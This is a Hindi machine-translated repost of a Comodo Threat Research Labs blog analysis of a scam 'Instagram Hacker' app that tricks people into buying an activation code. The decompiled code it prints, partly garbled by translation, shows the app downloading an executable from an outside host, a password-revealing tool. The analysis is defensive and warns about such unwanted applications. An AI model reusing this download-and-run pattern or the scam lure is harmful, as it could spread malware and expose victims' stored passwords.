पढ़ने का समय: 4 मिनट
बहुत से लोग संभावित रूप से अवांछित अनुप्रयोगों (पीयूए) को गंभीर खतरे के रूप में नहीं लेते हैं। इस तरह के लापरवाह रवैये का कारण यह है कि पीयूए आमतौर पर उपयोगकर्ता की सहमति से स्थापित होते हैं। लेकिन यह राय एक बड़ी गलती है। और केवल इसलिए नहीं कि एक पीयूए ड्राइव-बाय डाउनलोड के आधार पर एडवेयर या स्पाइवेयर जैसे अन्य कार्यक्रमों को गुप्त रूप से स्थापित कर सकता है। ज्वलंत उदाहरण नीचे कोमोडो थ्रेट रिसर्च लैब्स द्वारा विश्लेषण किया गया है विशेषज्ञ स्पष्ट रूप से प्रदर्शित करते हैं कि एक पीयूए एक अधिक खतरनाक हथियार हो सकता है।
"इंस्टाग्राम हैकर" नाम के सॉफ्टवेयर से मिलिए। इसकी आधिकारिक वेबसाइट है https://hackinstagram.net/ और वादा करता है ... किसी भी Instagram खाते को हैक करने के लिए। इसके अलावा, आप इसे मुफ्त में डाउनलोड और इंस्टॉल कर सकते हैं।
स्थापना के बाद, यह एक Instagram प्रोफ़ाइल URL दर्ज करने और पासवर्ड हैक करने का संकेत देता है।
परिणाम कुछ ही सेकंड में आता है:
लेकिन "पासवर्ड देखें" बटन पर क्लिक करने के बाद, एक नई विंडो दिखाई देती है:
"एक सक्रियण कोड प्राप्त करें" बटन पर क्लिक करने से "पेज खरीदें" पर रीडायरेक्ट हो जाता है।
यह "एक्टिवेशन कोड" खरीदने की पेशकश करता है लेकिन ... क्या आप हवा में धोखाधड़ी की गंध महसूस कर सकते हैं? यह स्पष्ट है कि इंस्टाग्राम पासवर्ड को सेकंड के लिए तोड़ने में सक्षम कोई भी सॉफ्टवेयर मौजूद नहीं हो सकता है। तो क्या इंस्टाग्राम हैकर साधारण लोगों को धोखा देने के लिए सिर्फ एक और धोखा देने वाला उपकरण है? इसे जांचने का सबसे अच्छा तरीका एप्लिकेशन कोड के अंदर देखना है।
कोड डॉटनेट रिएक्टर से सुरक्षित है लेकिन इसे डी4डॉट टूल से डिकोड किया जा सकता है।
और अब हम निश्चित रूप से देख सकते हैं कि एप्लिकेशन धोखाधड़ी का एक उपकरण है। कोड का पहला टुकड़ा सिर्फ प्रगति प्रदर्शन संकेतक को नकली करता है।
लेकिन एक और दिलचस्प है। जैसा कि आप देख सकते हैं, इसमें एक URL होता है जिसमें एक निष्पादन योग्य डाउनलोड होता है यदि सक्रियण सफल रहा।
लोड हो रहा हैविंडो ()
{
Class2.qDiUy7EzyuIMj ();
this.filename = "view.exe";
this.uri = नया उरी ("http://software-logistics.net/external/component/download/view.exe");
this.InitializeComponent ();
अगर (फ़ाइल। मौजूद है (यह। फ़ाइल नाम))
{
फ़ाइल। हटाएं (यह। फ़ाइल नाम);
}
कोशिश
{
वेब क्लाइंट क्लाइंट 1 = नया वेब क्लाइंट ();
client1.DownloadFileAsync(this.uri, this.filename);
क्लाइंट1.डाउनलोड प्रोग्रेस चेंज + = नया डाउनलोड प्रोग्रेस चेंजेडइवेंटहैंडलर (यह। विधि_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
पकड़
{
यह.विधि_0 ();
}
}
}
}
यदि हम निष्पादन योग्य चलाते हैं, तो हम पाएंगे कि यह NirSoft का WebBrowserPassView एप्लिकेशन है:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView सिर्फ एक पासवर्ड निष्कर्षण उपकरण है जो वेब ब्राउज़र द्वारा संग्रहीत पासवर्ड को प्रकट करता है। तो इस सॉफ़्टवेयर द्वारा निकाले जा सकने वाले सभी पासवर्ड Instagram के नहीं हैं, बल्कि उपयोगकर्ताओं के अपने पासवर्ड उनके ब्राउज़र में रखे गए हैं!
आइए फिर से शुरू करें: इंस्टाग्राम हैकर जो कुछ भी करता है वह है NirSoft से एक और PUA डाउनलोड करना और लॉन्च करना। तो हम स्पष्ट रूप से एक धोखाधड़ी उपकरण का सामना करते हैं। यहां हेरफेर करने वाली मनोवैज्ञानिक चाल पर ध्यान दें: यदि पीड़ित को पता चलता है कि उसके साथ धोखा हुआ है, तो वह घटना के बारे में पुलिस को शायद ही रिपोर्ट करती है। क्योंकि उस मामले में, उसे इंस्टाग्राम को हैक करने की कोशिश में कबूल करना होगा, यह एक साइबर अपराध करने का कार्य है।
लेकिन यह किनारे का एक पतला छोर है।
सबसे खतरनाक खतरा यह है कि एप्लिकेशन में URL को किसी अन्य पर दुर्भावनापूर्ण फ़ाइल के साथ आसानी से बदला जा सकता है जिसे पीड़ित की मशीन पर निष्पादित किया जाएगा। तो यह पीयूए - साथ ही इस तरह के मैलवेयर प्रकार के कई अन्य उदाहरण - का उपयोग विभिन्न "भारी" मैलवेयर जैसे ट्रोजन, बैकडोर, के बड़े पैमाने पर प्रसार के लिए किया जा सकता है। Ransomware इत्यादि
और यह PUA को वास्तव में खतरनाक मैलवेयर के रूप में लेने का एक अच्छा कारण है। क्योंकि यह विनाशकारी बड़े पैमाने पर साइबर हमले के लिए एक स्प्रिंगबोर्ड बन सकता है।
"आज हमें विचार नहीं करना चाहिए मैलवेयर कोमोडो थ्रेट रिसर्च लैब्स के प्रमुख फातिह ओरहान कहते हैं, "खतरनाक या खतरनाक नहीं।" "कोई भी मैलवेयर एक अलग स्थान में मौजूद नहीं है। आजकल साइबर अपराधी उपयोगकर्ताओं पर हमला करने के लिए लंबी मैलवेयर श्रृंखला बनाते हैं, और जैसा कि आप देख सकते हैं, पीयूए ऐसी हत्या श्रृंखला में एक कड़ी हो सकता है। इसलिए हमें कुदाल को कुदाल कहना चाहिए। हां, ये एप्लिकेशन डाउनलोड किए जाते हैं और उपयोगकर्ताओं के अनुमोदन से चलाए जाते हैं, लेकिन, जैसा कि इस मामले में, धोखाधड़ी द्वारा अनुमोदन जबरन लिया जाता है। संभावित अवांछित अनुप्रयोगों के दौरान वैध होने का दिखावा करते हैं, हर किसी को यह समझने की जरूरत है कि यह सिर्फ एक छलावरण है। यही कारण है कि कोमोडो न केवल उच्च तकनीकी सुरक्षा प्रदान करता है बल्कि नियमित रूप से उपयोगकर्ताओं को साइबर स्पेस में खतरनाक जाल से बचने के लिए सूचित करता है।
कोमोडो के साथ सुरक्षित रहें!
संबंधित संसाधन
विकिपीडिया DDOS हमला
मैलवेयर हटाने
वेबसाइट मालवेयर स्कैनर
सर्वोत्तम वेबसाइट सुरक्षा
वर्डप्रेस सुरक्षा
निशुल्क आजमाइश शुरु करें मुफ़्त के लिए अपनी सुरक्षा स्कोर प्राप्त करें
- एसईओ संचालित सामग्री और पीआर वितरण। आज ही प्रवर्धित हो जाओ।
- प्लेटोब्लॉकचैन। Web3 मेटावर्स इंटेलिजेंस। ज्ञान प्रवर्धित। यहां पहुंचें।
- स्रोत: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- योग्य
- About
- लेखा
- अधिनियम
- सक्रियण
- बाद
- आकाशवाणी
- सब
- और
- अन्य
- आवेदन
- अनुप्रयोगों
- अनुमोदन
- आक्रमण
- रवैया
- पिछले दरवाजे
- आधार
- क्योंकि
- BEST
- बड़ा
- ब्लॉग
- टूटना
- ब्राउज़रों
- निर्माण
- बटन
- खरीदने के लिए
- कॉल
- मामला
- श्रृंखला
- चेन
- चेक
- स्पष्ट रूप से
- कोड
- करने
- सहमति
- विचार करना
- शामिल हैं
- साइबर हमला
- cybercrime
- साइबर अपराधी
- खतरा
- खतरनाक
- DDoS
- भयानक
- पता चलता है
- dont
- डबल
- डाउनलोड
- आसानी
- Edge
- दर्ज
- आदि
- कार्यक्रम
- उदाहरण
- उदाहरण
- विशेषज्ञों
- उद्धरण
- चेहरा
- कुछ
- पट्टिका
- खोज
- प्रथम
- धोखा
- मुक्त
- से
- मिल
- अच्छा
- अधिक से अधिक
- हैक
- हैकर
- सिर
- यहाँ उत्पन्न करें
- कैसे
- How To
- एचटीएमएल
- HTTPS
- in
- घटना
- सूचक
- इंस्टाग्राम
- स्थापित
- तुरंत
- दिलचस्प
- पृथक
- IT
- लैब्स
- शुरू करने
- LINK
- लंबा
- देखिए
- मशीन
- मैलवेयर
- मालवेयर अटैक
- बहुत
- विशाल
- अधिकतम-चौड़ाई
- गलती
- अधिक
- अधिकांश
- नामांकित
- की जरूरत है
- नया
- स्पष्ट
- ऑफर
- सरकारी
- सरकारी वेबसाइट
- ONE
- राय
- अन्य
- अपना
- पासवर्ड
- पासवर्ड
- स्टाफ़
- PHP
- प्लेटो
- प्लेटो डेटा इंटेलिजेंस
- प्लेटोडाटा
- पुलिस
- संभावित
- को रोकने के
- प्रोफाइल
- प्रोग्राम्स
- प्रगति
- का वादा किया
- संरक्षित
- सुरक्षा
- प्रदान करना
- महसूस करना
- कारण
- लापरवाह
- नियमित तौर पर
- रिपोर्ट
- अनुसंधान
- परिणाम
- बायोडाटा
- पता चलता है
- छुटकारा
- रन
- स्कोरकार्ड
- सेकंड
- सुरक्षित
- सुरक्षा
- गंभीर
- चाहिए
- So
- सॉफ्टवेयर
- अंतरिक्ष
- स्पायवेयर
- संग्रहित
- सफल
- ऐसा
- लेना
- तकनीकी
- RSI
- लेकिन हाल ही
- धमकी
- भर
- पहर
- सेवा मेरे
- साधन
- जाल
- मोड़
- समझना
- अवांछित
- यूआरएल
- उपयोगकर्ता
- उपयोगकर्ताओं
- आमतौर पर
- विभिन्न
- शिकार
- देखें
- वेब
- वेब ब्राउज़र्स
- वेबसाइट
- मर्जी
- होगा
- आप
- आपका
- जेफिरनेट